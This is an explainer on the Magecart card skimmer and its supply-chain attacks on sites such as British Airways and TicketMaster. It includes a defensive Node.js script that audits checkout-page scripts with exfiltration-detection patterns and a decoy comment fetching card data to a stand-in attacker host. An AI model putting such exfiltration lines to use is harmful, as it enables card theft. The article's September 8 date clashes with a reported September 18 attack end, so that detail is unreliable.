In-brief: Magecart digital skimmer

Date: September 08, 2018

Magecart is the name that the company RiskIQ gave to a piece of banking malware designed to steal credit card details while the card is being used on an infected e-commerce web site. Magecart was used in several large incidents during summer 2018, in particular the incident that affected British Airways in late August, where Magecart infected the site's payment system and stole 380,000 bank card details in 2 weeks.

Magecart is a small and simple JavaScript program (less than 20 lines of code) that the hacker silently installs on a web site once he or she has managed to break into it. It is often placed in a general section of the site (such as the page footer) so that it can monitor the activity of visitors throughout their visit. When a visitor enters his or her bank details (at the end of the ordering process), Magecart sends a copy of all the data entered (credit card number, cardholder's name, card expiry date and CVV code) to a remote site controlled by the hacker. This kind of malware is often called a "form grabber" (because it captures all the data entered in the payment form), "formjacking" or even a "digital skimmer". In the bank fraud field, a "skimmer" is traditionally a small hardware device, secretly installed by a hacker on a payment terminal (e.g. a cash dispenser or ATM), that steals credit card details when a card is used in the trapped terminal. The "digital skimmer" works the same way, but this time it is software code added to the compromised web site rather than a hardware device.

RiskIQ discovered the first versions of Magecart in 2015. At that time the malware was designed to infect small e-commerce web sites built with software such as Magento, PrestaShop or OpenCart. But in July 2018, RiskIQ discovered that Magecart had evolved into a much larger threat, while analysing a Magecart attack against TicketMaster (an international ticket sales company) that ran from February to June 2018 and affected at least 40,000 customers in the UK. RiskIQ found that Magecart had not been installed directly on the TicketMaster web site, but rather on the servers of one of TicketMaster's suppliers, Inbenta.com. Inbenta provides chatbot services to its customers (including TicketMaster), and when you visit the TicketMaster web site, part of the code executed is actually hosted on Inbenta's servers. It was on these Inbenta servers that the hacker installed the Magecart skimmer. In its study published in early July 2018, RiskIQ shows that this is not an isolated case: it identified other web service providers, similar to Inbenta, that had also been compromised by Magecart. It cites in particular the following companies: SociaPlus, PushAssist and Annex Cloud (three companies specializing in web audience and marketing), and Clarity Connect (a hosting service for e-commerce sites).
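The skimmer described above lives in the page's own script tags, and the TicketMaster case shows that it can also arrive through a third-party script host. A defender's check that follows from both points is to audit every `<script>` on a checkout page against an allowlist of hosts, require Subresource Integrity on approved third-party scripts, and look for inline code that both monitors the payment form and sends data off-site. The Node.js script below is an added example written for this note; it is not code from RiskIQ or from any of the companies mentioned, and the base URL, the allowlist and the sample HTML (including the decoy inline fragment, which only carries the tokens a skimmer would show) are constructed.

```javascript
// Added example for this note (not RiskIQ code): audit the <script> tags of a
// checkout page for signs of an injected digital skimmer.
// Assumptions (constructed): the shop runs at BASE_URL and legitimately loads
// scripts only from the hosts listed in ALLOWED_HOSTS.
const BASE_URL = "https://www.example-shop.test/checkout";
const ALLOWED_HOSTS = new Set([
  "www.example-shop.test",    // first party
  "cdn.example-shop.test",    // the shop's own CDN
  "chat.example-vendor.test"  // an approved chatbot supplier (cf. the Inbenta case)
]);

// Behaviours a form grabber needs: access to field values, a hook on user
// input or form submission, and a way to send data off-site.
const READS_FORM = /\.value\b|new FormData\(|querySelectorAll\(\s*['"]input/;
const HOOKS_INPUT = /addEventListener\(\s*['"](submit|input|change|keyup|blur|click|mouseup|touchend)['"]/;
const SENDS_OUT = /XMLHttpRequest|\bfetch\(|sendBeacon|new Image\(|new WebSocket\(/;
const LITERAL_URL = /https?:\/\/[^"'\s)]+/;

// Pull every <script> element out of the HTML: its src (if any), its inline
// body, and whether it carries a Subresource Integrity hash.
function parseScripts(html) {
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const scripts = [];
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({
      src: src ? src[1] : null,
      body: m[2],
      hasIntegrity: /\bintegrity\s*=/i.test(m[1])
    });
  }
  return scripts;
}

// Return one finding per suspicious script. External scripts are judged by
// their host; inline scripts by the combination of behaviours above.
function auditScripts(html, allowedHosts, baseUrl) {
  const firstPartyHost = new URL(baseUrl).hostname;
  const findings = [];
  for (const s of parseScripts(html)) {
    if (s.src !== null) {
      const host = new URL(s.src, baseUrl).hostname; // a relative src resolves to the first party
      if (!allowedHosts.has(host)) {
        findings.push({ kind: "unlisted-external-script", detail: host });
      } else if (host !== firstPartyHost && !s.hasIntegrity) {
        // An approved supplier can still be compromised; SRI pins the delivered content.
        findings.push({ kind: "third-party-script-without-sri", detail: host });
      }
      continue;
    }
    const monitorsForm = READS_FORM.test(s.body) || HOOKS_INPUT.test(s.body);
    if (monitorsForm && SENDS_OUT.test(s.body)) {
      const url = LITERAL_URL.exec(s.body);
      findings.push({
        kind: "inline-form-exfil-pattern",
        detail: url ? new URL(url[0]).hostname : "(no literal URL)"
      });
    }
  }
  return findings;
}

// Constructed sample checkout page. The last script is a decoy: it contains the
// tokens a skimmer would show, but the exfiltration part is only a comment.
const SAMPLE_HTML = `
<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-shop.test/lib.js" integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://chat.example-vendor.test/widget.js"></script>
<script src="https://cdn-stats.example-unknown.test/s.js"></script>
</head><body>
<script>window.dataLayer = window.dataLayer || [];</script>
<form id="checkout"><input id="cardnumber"></form>
<script>
// decoy: a submit hook whose handler is never defined here
var f = document.querySelector('#checkout');
f.addEventListener('submit', onSubmit);
// onSubmit would read document.querySelector('#cardnumber').value and call
// fetch('https://collector.attacker-controlled.test/log', ...)
</script>
</body></html>`;

for (const f of auditScripts(SAMPLE_HTML, ALLOWED_HOSTS, BASE_URL)) {
  console.log(`${f.kind}: ${f.detail}`);
}
```

Run against the sample page this reports the approved chat widget loaded without SRI, the unlisted statistics host, and the inline fragment pointing at the constructed collector host; the first-party scripts and the harmless `dataLayer` snippet produce nothing. The heuristics are deliberately coarse (they match comments as well as code), which is the right trade-off for a periodic check of a handful of payment pages where every hit gets a human look.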

RiskIQ estimates that these incidents have affected more than 800 e-commerce sites worldwide, making Magecart the most powerful attacker group in the field of credit card data theft. Magecart is thus able both to perform direct attacks against large e-commerce web sites (such as British Airways) and to mount complex attacks that infect third-party web services and remain undetected for several months.

Here is a (provisional) list of the recent Magecart victims:

  • TicketMaster: Magecart indirect attack through the services provided by the Inbenta Company. 40,000 victims declared, for an attack lasting from February to June 2018. See this RiskIQ analysis.
  • British Airways: direct attack on the airline's web site (breached through a yet unknown vector). 380,000 victims for a 15-day attack (August 21 to September 5, 2018). See this RiskIQ analysis.
  • Newegg.com: direct attack on this US site selling computer equipment. The attack lasted from August 14 to September 18, 2018. See this RiskIQ analysis.
  • A series of small companies also reported in September 2018 that they had been attacked through the services provided by Annex Cloud: Stein Mart, Title Nine, Plant Therapy and Peaceful Valley Farm Supply (see this Twitter message, which lists these victims).